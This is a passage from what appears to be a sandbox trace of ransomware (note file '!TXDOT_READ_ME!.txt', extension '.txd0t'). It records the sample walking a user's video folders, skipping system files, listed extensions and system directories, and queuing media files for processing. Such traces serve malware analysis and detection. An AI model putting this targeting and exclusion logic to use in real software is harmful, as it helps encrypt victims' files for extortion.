psz2="desktop.ini") returned 1 [0076.981] StrCmpIW (psz1="mZX-jxKKh.mkv", psz2="autorun.inf") returned 1 [0076.981] StrCmpIW (psz1="mZX-jxKKh.mkv", psz2="ntuser.dat") returned -1 [0076.981] StrCmpIW (psz1="mZX-jxKKh.mkv", psz2="ntldr") returned -1 [0076.981] StrCmpIW (psz1="mZX-jxKKh.mkv", psz2="ntdetect.com") returned -1 [0076.981] StrCmpIW (psz1="mZX-jxKKh.mkv", psz2="bootfont.bin") returned 1 [0076.981] StrCmpIW (psz1="mZX-jxKKh.mkv", psz2="!TXDOT_READ_ME!.txt") returned 1 [0076.981] PathFindExtensionW (pszPath="mZX-jxKKh.mkv") returned=".mkv" [0076.982] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".mkv") returned 0x0 [0076.982] FileTimeToSystemTime (in: lpFileTime=0x552eeec, lpSystemTime=0x552eed8 | out: lpSystemTime=0x552eed8) returned 1 [0076.982] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552eed8, lpLocalTime=0x552eea8 | out: lpLocalTime=0x552eea8) returned 1 [0076.982] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0076.982] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0076.982] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\mZX-jxKKh.mkv", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\mZX-jxKKh.mkv") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\mZX-jxKKh.mkv" [0076.982] SetEvent (hEvent=0x3fc) returned 1 [0076.988] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x552eee8 | out: lpFindFileData=0x552eee8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc450e690, ftCreationTime.dwHighDateTime=0x1d5eb8d, ftLastAccessTime.dwLowDateTime=0x90a3f880, ftLastAccessTime.dwHighDateTime=0x1d5e5a4, ftLastWriteTime.dwLowDateTime=0x90a3f880, ftLastWriteTime.dwHighDateTime=0x1d5e5a4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Z2p1JCW7G9Pu", cAlternateFileName="Z2P1JC~1")) returned 1 [0076.988] StrCmpW (psz1="Z2p1JCW7G9Pu", psz2=".") returned 1 [0076.988] StrCmpW (psz1="Z2p1JCW7G9Pu", psz2="..") returned 1 [0076.988] StrCpyNW (in: psz1=0xed56d0, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq" [0076.988] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", psz2="\\", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\" [0076.988] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\", psz2="Z2p1JCW7G9Pu", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu" [0076.988] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu", lpSrch="\\windows\\system32\\") returned 0x0 [0076.988] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu", lpSrch="\\windows\\syswow64\\") returned 0x0 [0076.988] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu", lpSrch="\\windows\\system\\") returned 0x0 [0076.988] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu", lpSrch="\\windows\\winsxs\\") returned 0x0 [0076.988] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu", lpSrch="\\appdata\\roaming\\") returned 0x0 [0076.988] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu", lpSrch="\\appdata\\local\\") returned 0x0 [0076.988] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu", lpSrch="\\appdata\\locallow\\") returned 0x0 [0076.988] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu", lpSrch="\\all users\\microsoft\\") returned 0x0 [0076.988] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu", lpSrch="\\inetpub\\logs\\") returned 0x0 [0076.988] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu", lpSrch=":\\boot\\") returned 0x0 [0076.988] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu", lpSrch=":\\perflogs\\") returned 0x0 [0076.988] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu", lpSrch=":\\programdata\\") returned 0x0 [0076.988] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu", lpSrch=":\\drivers\\") returned 0x0 [0076.988] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu", lpSrch=":\\wsus\\") returned 0x0 [0076.988] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu", lpSrch=":\\efstmpwp\\") returned 0x0 [0076.988] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu", lpSrch=":\\$recycle.bin\\") returned 0x0 [0076.988] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu", lpSrch="crypt_detect") returned 0x0 [0076.988] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu", lpSrch="cryptolocker") returned 0x0 [0076.988] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu", lpSrch="ransomware") returned 0x0 [0076.989] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu", lpSrch="C:\\WINDOWS") returned 0x0 [0076.989] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu", lpSrch="C:\\Program Files (x86)") returned 0x0 [0076.989] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu", lpSrch="C:\\Program Files") returned 0x0 [0076.989] GetProcessHeap () returned 0xe30000 [0076.989] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4ee) returned 0xed6bb8 [0076.989] StrCpyNW (in: psz1=0xed6bb8, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu", cchMax=1134 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu" [0076.989] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu", psz2="\\*", cchMax=1134 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\*") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\*" [0076.989] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\*", lpFindFileData=0x552ec38 | out: lpFindFileData=0x552ec38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc450e690, ftCreationTime.dwHighDateTime=0x1d5eb8d, ftLastAccessTime.dwLowDateTime=0x90a3f880, ftLastAccessTime.dwHighDateTime=0x1d5e5a4, ftLastWriteTime.dwLowDateTime=0x90a3f880, ftLastWriteTime.dwHighDateTime=0x1d5e5a4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x570ea4, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2170 [0076.989] StrCmpW (psz1=".", psz2=".") returned 0 [0076.989] FindNextFileW (in: hFindFile=0xec2170, lpFindFileData=0x552ec38 | out: lpFindFileData=0x552ec38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc450e690, ftCreationTime.dwHighDateTime=0x1d5eb8d, ftLastAccessTime.dwLowDateTime=0x90a3f880, ftLastAccessTime.dwHighDateTime=0x1d5e5a4, ftLastWriteTime.dwLowDateTime=0x90a3f880, ftLastWriteTime.dwHighDateTime=0x1d5e5a4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x570ea4, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0076.989] StrCmpW (psz1="..", psz2=".") returned 1 [0076.989] StrCmpW (psz1="..", psz2="..") returned 0 [0076.989] FindNextFileW (in: hFindFile=0xec2170, lpFindFileData=0x552ec38 | out: lpFindFileData=0x552ec38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe193def0, ftCreationTime.dwHighDateTime=0x1d5e3c3, ftLastAccessTime.dwLowDateTime=0xa2d2a3d0, ftLastAccessTime.dwHighDateTime=0x1d5f049, ftLastWriteTime.dwLowDateTime=0xa2d2a3d0, ftLastWriteTime.dwHighDateTime=0x1d5f049, nFileSizeHigh=0x0, nFileSizeLow=0x11f6d, dwReserved0=0x570ea4, dwReserved1=0x0, cFileName="AuNane-wUgoPDM.swf", cAlternateFileName="AUNANE~1.SWF")) returned 1 [0076.989] StrCmpW (psz1="AuNane-wUgoPDM.swf", psz2=".") returned 1 [0076.989] StrCmpW (psz1="AuNane-wUgoPDM.swf", psz2="..") returned 1 [0076.989] StrCpyNW (in: psz1=0xed6bb8, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu", cchMax=1134 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu" [0076.989] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu", psz2="\\", cchMax=1134 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\" [0076.989] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\", psz2="AuNane-wUgoPDM.swf", cchMax=1134 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\AuNane-wUgoPDM.swf") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\AuNane-wUgoPDM.swf" [0076.989] PathFindExtensionW (pszPath="AuNane-wUgoPDM.swf") returned=".swf" [0076.989] StrCmpW (psz1=".swf", psz2=".txd0t") returned -1 [0076.989] StrCmpIW (psz1="AuNane-wUgoPDM.swf", psz2="bootsect.bak") returned -1 [0076.989] StrCmpIW (psz1="AuNane-wUgoPDM.swf", psz2="iconcache.db") returned -1 [0076.989] StrCmpIW (psz1="AuNane-wUgoPDM.swf", psz2="thumbs.db") returned -1 [0076.989] StrCmpIW (psz1="AuNane-wUgoPDM.swf", psz2=" ransomware ") returned 1 [0076.989] StrCmpIW (psz1="AuNane-wUgoPDM.swf", psz2=" ransom ") returned 1 [0076.989] StrCmpIW (psz1="AuNane-wUgoPDM.swf", psz2="debug.txt") returned -1 [0076.989] StrCmpIW (psz1="AuNane-wUgoPDM.swf", psz2="boot.ini") returned -1 [0076.989] StrCmpIW (psz1="AuNane-wUgoPDM.swf", psz2="desktop.ini") returned -1 [0076.989] StrCmpIW (psz1="AuNane-wUgoPDM.swf", psz2="autorun.inf") returned -1 [0076.990] StrCmpIW (psz1="AuNane-wUgoPDM.swf", psz2="ntuser.dat") returned -1 [0076.990] StrCmpIW (psz1="AuNane-wUgoPDM.swf", psz2="ntldr") returned -1 [0076.990] StrCmpIW (psz1="AuNane-wUgoPDM.swf", psz2="ntdetect.com") returned -1 [0076.990] StrCmpIW (psz1="AuNane-wUgoPDM.swf", psz2="bootfont.bin") returned -1 [0076.990] StrCmpIW (psz1="AuNane-wUgoPDM.swf", psz2="!TXDOT_READ_ME!.txt") returned 1 [0076.990] PathFindExtensionW (pszPath="AuNane-wUgoPDM.swf") returned=".swf" [0076.990] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".swf") returned 0x0 [0076.990] FileTimeToSystemTime (in: lpFileTime=0x552ec3c, lpSystemTime=0x552ec28 | out: lpSystemTime=0x552ec28) returned 1 [0076.990] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552ec28, lpLocalTime=0x552ebf8 | out: lpLocalTime=0x552ebf8) returned 1 [0076.990] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0076.990] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0076.990] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\AuNane-wUgoPDM.swf", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\AuNane-wUgoPDM.swf") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\AuNane-wUgoPDM.swf" [0076.990] SetEvent (hEvent=0x3fc) returned 1 [0077.000] FindNextFileW (in: hFindFile=0xec2170, lpFindFileData=0x552ec38 | out: lpFindFileData=0x552ec38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaaf48690, ftCreationTime.dwHighDateTime=0x1d5f08b, ftLastAccessTime.dwLowDateTime=0xdd8dc560, ftLastAccessTime.dwHighDateTime=0x1d5f00b, ftLastWriteTime.dwLowDateTime=0xdd8dc560, ftLastWriteTime.dwHighDateTime=0x1d5f00b, nFileSizeHigh=0x0, nFileSizeLow=0xac32, dwReserved0=0x570ea4, dwReserved1=0x0, cFileName="w7jO4I_4r ubq7OFIn.flv", cAlternateFileName="W7JO4I~1.FLV")) returned 1 [0077.001] StrCmpW (psz1="w7jO4I_4r ubq7OFIn.flv", psz2=".") returned 1 [0077.001] StrCmpW (psz1="w7jO4I_4r ubq7OFIn.flv", psz2="..") returned 1 [0077.001] StrCpyNW (in: psz1=0xed6bb8, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu", cchMax=1134 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu" [0077.001] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu", psz2="\\", cchMax=1134 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\" [0077.001] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\", psz2="w7jO4I_4r ubq7OFIn.flv", cchMax=1134 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\w7jO4I_4r ubq7OFIn.flv") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\w7jO4I_4r ubq7OFIn.flv" [0077.001] PathFindExtensionW (pszPath="w7jO4I_4r ubq7OFIn.flv") returned=".flv" [0077.001] StrCmpW (psz1=".flv", psz2=".txd0t") returned -1 [0077.001] StrCmpIW (psz1="w7jO4I_4r ubq7OFIn.flv", psz2="bootsect.bak") returned 1 [0077.001] StrCmpIW (psz1="w7jO4I_4r ubq7OFIn.flv", psz2="iconcache.db") returned 1 [0077.001] StrCmpIW (psz1="w7jO4I_4r ubq7OFIn.flv", psz2="thumbs.db") returned 1 [0077.001] StrCmpIW (psz1="w7jO4I_4r ubq7OFIn.flv", psz2=" ransomware ") returned 1 [0077.001] StrCmpIW (psz1="w7jO4I_4r ubq7OFIn.flv", psz2=" ransom ") returned 1 [0077.002] StrCmpIW (psz1="w7jO4I_4r ubq7OFIn.flv", psz2="debug.txt") returned 1 [0077.002] StrCmpIW (psz1="w7jO4I_4r ubq7OFIn.flv", psz2="boot.ini") returned 1 [0077.002] StrCmpIW (psz1="w7jO4I_4r ubq7OFIn.flv", psz2="desktop.ini") returned 1 [0077.006] StrCmpIW (psz1="w7jO4I_4r ubq7OFIn.flv", psz2="autorun.inf") returned 1 [0077.006] StrCmpIW (psz1="w7jO4I_4r ubq7OFIn.flv", psz2="ntuser.dat") returned 1 [0077.006] StrCmpIW (psz1="w7jO4I_4r ubq7OFIn.flv", psz2="ntldr") returned 1 [0077.006] StrCmpIW (psz1="w7jO4I_4r ubq7OFIn.flv", psz2="ntdetect.com") returned 1 [0077.006] StrCmpIW (psz1="w7jO4I_4r ubq7OFIn.flv", psz2="bootfont.bin") returned 1 [0077.006] StrCmpIW (psz1="w7jO4I_4r ubq7OFIn.flv", psz2="!TXDOT_READ_ME!.txt") returned 1 [0077.006] PathFindExtensionW (pszPath="w7jO4I_4r ubq7OFIn.flv") returned=".flv" [0077.006] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".flv") returned 0x0 [0077.006] FileTimeToSystemTime (in: lpFileTime=0x552ec3c, lpSystemTime=0x552ec28 | out: lpSystemTime=0x552ec28) returned 1 [0077.006] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552ec28, lpLocalTime=0x552ebf8 | out: lpLocalTime=0x552ebf8) returned 1 [0077.006] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0077.006] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0077.006] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\w7jO4I_4r ubq7OFIn.flv", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\w7jO4I_4r ubq7OFIn.flv") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\w7jO4I_4r ubq7OFIn.flv" [0077.006] SetEvent (hEvent=0x3fc) returned 1 [0077.009] FindNextFileW (in: hFindFile=0xec2170, lpFindFileData=0x552ec38 | out: lpFindFileData=0x552ec38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaaf48690, ftCreationTime.dwHighDateTime=0x1d5f08b, ftLastAccessTime.dwLowDateTime=0xdd8dc560, ftLastAccessTime.dwHighDateTime=0x1d5f00b, ftLastWriteTime.dwLowDateTime=0xdd8dc560, ftLastWriteTime.dwHighDateTime=0x1d5f00b, nFileSizeHigh=0x0, nFileSizeLow=0xac32, dwReserved0=0x570ea4, dwReserved1=0x0, cFileName="w7jO4I_4r ubq7OFIn.flv", cAlternateFileName="W7JO4I~1.FLV")) returned 0 [0077.013] FindClose (in: hFindFile=0xec2170 | out: hFindFile=0xec2170) returned 1 [0077.013] GetProcessHeap () returned 0xe30000 [0077.013] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed6bb8 | out: hHeap=0xe30000) returned 1 [0077.013] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x552eee8 | out: lpFindFileData=0x552eee8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b79baf0, ftCreationTime.dwHighDateTime=0x1d5eca1, ftLastAccessTime.dwLowDateTime=0x5d533ed0, ftLastAccessTime.dwHighDateTime=0x1d5ed9e, ftLastWriteTime.dwLowDateTime=0x5d533ed0, ftLastWriteTime.dwHighDateTime=0x1d5ed9e, nFileSizeHigh=0x0, nFileSizeLow=0x8638, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="ZXAEqbOqqWast AZ98L.flv", cAlternateFileName="ZXAEQB~1.FLV")) returned 1 [0077.013] StrCmpW (psz1="ZXAEqbOqqWast AZ98L.flv", psz2=".") returned 1 [0077.013] StrCmpW (psz1="ZXAEqbOqqWast AZ98L.flv", psz2="..") returned 1 [0077.014] StrCpyNW (in: psz1=0xed56d0, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq" [0077.014] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", psz2="\\", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\" [0077.014] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\", psz2="ZXAEqbOqqWast AZ98L.flv", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\ZXAEqbOqqWast AZ98L.flv") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\ZXAEqbOqqWast AZ98L.flv" [0077.014] PathFindExtensionW (pszPath="ZXAEqbOqqWast AZ98L.flv") returned=".flv" [0077.014] StrCmpW (psz1=".flv", psz2=".txd0t") returned -1 [0077.014] StrCmpIW (psz1="ZXAEqbOqqWast AZ98L.flv", psz2="bootsect.bak") returned 1 [0077.014] StrCmpIW (psz1="ZXAEqbOqqWast AZ98L.flv", psz2="iconcache.db") returned 1 [0077.014] StrCmpIW (psz1="ZXAEqbOqqWast AZ98L.flv", psz2="thumbs.db") returned 1 [0077.014] StrCmpIW (psz1="ZXAEqbOqqWast AZ98L.flv", psz2=" ransomware ") returned 1 [0077.014] StrCmpIW (psz1="ZXAEqbOqqWast AZ98L.flv", psz2=" ransom ") returned 1 [0077.014] StrCmpIW (psz1="ZXAEqbOqqWast AZ98L.flv", psz2="debug.txt") returned 1 [0077.014] StrCmpIW (psz1="ZXAEqbOqqWast AZ98L.flv", psz2="boot.ini") returned 1 [0077.014] StrCmpIW (psz1="ZXAEqbOqqWast AZ98L.flv", psz2="desktop.ini") returned 1 [0077.014] StrCmpIW (psz1="ZXAEqbOqqWast AZ98L.flv", psz2="autorun.inf") returned 1 [0077.014] StrCmpIW (psz1="ZXAEqbOqqWast AZ98L.flv", psz2="ntuser.dat") returned 1 [0077.014] StrCmpIW (psz1="ZXAEqbOqqWast AZ98L.flv", psz2="ntldr") returned 1 [0077.014] StrCmpIW (psz1="ZXAEqbOqqWast AZ98L.flv", psz2="ntdetect.com") returned 1 [0077.014] StrCmpIW (psz1="ZXAEqbOqqWast AZ98L.flv", psz2="bootfont.bin") returned 1 [0077.014] StrCmpIW (psz1="ZXAEqbOqqWast AZ98L.flv", psz2="!TXDOT_READ_ME!.txt") returned 1 [0077.014] PathFindExtensionW (pszPath="ZXAEqbOqqWast AZ98L.flv") returned=".flv" [0077.014] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".flv") returned 0x0 [0077.014] FileTimeToSystemTime (in: lpFileTime=0x552eeec, lpSystemTime=0x552eed8 | out: lpSystemTime=0x552eed8) returned 1 [0077.014] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552eed8, lpLocalTime=0x552eea8 | out: lpLocalTime=0x552eea8) returned 1 [0077.014] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0077.014] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0077.014] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\ZXAEqbOqqWast AZ98L.flv", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\ZXAEqbOqqWast AZ98L.flv") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\ZXAEqbOqqWast AZ98L.flv" [0077.014] SetEvent (hEvent=0x3fc) returned 1 [0077.018] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x552eee8 | out: lpFindFileData=0x552eee8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b79baf0, ftCreationTime.dwHighDateTime=0x1d5eca1, ftLastAccessTime.dwLowDateTime=0x5d533ed0, ftLastAccessTime.dwHighDateTime=0x1d5ed9e, ftLastWriteTime.dwLowDateTime=0x5d533ed0, ftLastWriteTime.dwHighDateTime=0x1d5ed9e, nFileSizeHigh=0x0, nFileSizeLow=0x8638, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="ZXAEqbOqqWast AZ98L.flv", cAlternateFileName="ZXAEQB~1.FLV")) returned 0 [0077.018] FindClose (in: hFindFile=0xec20f0 | out: hFindFile=0xec20f0) returned 1 [0077.019] GetProcessHeap () returned 0xe30000 [0077.020] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed56d0 | out: hHeap=0xe30000) returned 1 [0077.020] FindNextFileW (in: hFindFile=0xec2330, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, 